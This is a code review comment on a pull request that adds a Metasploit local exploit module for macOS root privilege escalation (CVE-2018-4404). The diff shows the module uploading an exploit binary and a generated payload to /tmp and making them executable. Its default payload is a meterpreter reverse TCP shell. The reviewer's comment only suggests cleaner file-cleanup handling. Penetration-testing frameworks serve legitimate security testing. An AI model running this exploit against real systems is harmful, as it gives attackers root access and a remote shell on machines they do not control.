modules/exploits/osx/local/ipc_mitm_ssudo.rb

```diff
@@ -0,0 +1,55 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mac OS X Root Privilege Escalation',
+      'Description'   => %q{
+      },
+      'License'       => MSF_LICENSE,
+      'Author'         => [ 'saelo' ],
+      'References'     => [
+          ['CVE', '2018-4404'],
+          ['URL', 'https://github.com/saelo/pwn2own2018'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => 'osx',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Mac OS X x64 (Native Payload)', { } ]
+        ],
+      'DisclosureDate' => 'Mar 15 2018'))
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2018-4404", "ssudo" ))
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    print_status("Uploading payload file as '#{payload_file}'")
+    write_file(payload_file, generate_payload_exe)
+    chmod(payload_file)
+    print_status("Uploading exploit file as '#{exploit_file}'")
+    write_file(exploit_file, exploit_data)
+    chmod(exploit_file)
+    register_file_for_cleanup(payload_file)
```

Comment:
Where possible, the `register_file_for_cleanup` calls should immediately follow the `write_file` call to ensure cleanup in the event that intermediary method calls fail.

Given that you use the `write_file` a few times, the traditional technique is to define a method which automatically takes care of the `register_file_for_cleanup` call, and has a print message for the operator:

```ruby
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path                                                                                                   
    write_file path, data
    register_file_for_cleanup path
  end
```